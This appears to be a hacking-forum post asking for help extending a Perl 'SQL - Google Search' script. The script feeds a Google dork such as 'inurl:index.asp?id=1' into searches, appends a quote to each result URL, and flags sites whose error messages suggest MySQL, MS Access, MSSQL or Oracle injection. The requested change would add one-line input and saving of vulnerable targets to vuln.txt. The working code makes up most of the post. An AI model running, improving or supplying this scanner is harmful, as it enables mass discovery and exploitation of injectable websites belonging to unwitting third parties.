Нужен скрипт MSSQL error scanner Option 1.scann via dork (test.asp?id=) hxxp://www.blackle.com/ or 2.scan from text file no problem if script is on pl,py or php
Hi all i need some perl guru help to modify this. Old Options 1.Insert Dork:inurl:index.asp?id=1 2.Total Query Pages (10 Links/Pages) :20 to new option in 1 line dork + query and option to save result in vuln.txt file in the same directoy Insert Dork:inurl:index.asp?id=1 20 vuln.txt Code: #!/usr/bin/perl use LWP::Simple; use LWP::UserAgent; use HTTP::Request; my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } print "+++++++++++++++++++++++++++++++\n"; print "+ SQL - Google Search +\n"; print "+ CWH Underground +\n"; print "+++++++++++++++++++++++++++++++\n\n"; print "Insert Dork:"; chomp( my $dork = <STDIN> ); print "Total Query Pages (10 Links/Pages) :"; chomp( my $page = <STDIN> ); print "\n[+] Result:\n\n"; for($start = 0;$start != $page*10;$start += 10) { $t = "http://www.google.com/cse?cx=013269018370076798483:gg7jrrhpsy4&cof=FORID:1&q=".$dork."&btnG=Search&start=".$start; $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2'); $ua->timeout(10); $ua->env_proxy; $response = $ua->get($t); if ($response->is_success) { $c = $response->content; @stuff = split(/<a href=/,$c); foreach $line(@stuff) { if($line =~/(.*) class=l/ig) { $out = $1; $out =~ s/\"//g; $out =~s/$/\'/; $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2'); $ua->timeout(10); $ua->env_proxy; $response = $ua->get($out); $error = $response->content(); if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/) {print "$out => Could be Vulnerable in MySQL Injection!!\n";} elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/) {print "$out => Could be Vulnerable in MS Access Injection!!\n";} elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/) {print "$out => Could be Vulnerable in MSSQL Injection!!\n";} elsif($error =~m/Microsoft OLE DB Provider for Oracle/) {print "$out => Could be Vulnerable in Oracle Injection!!\n";} } } } }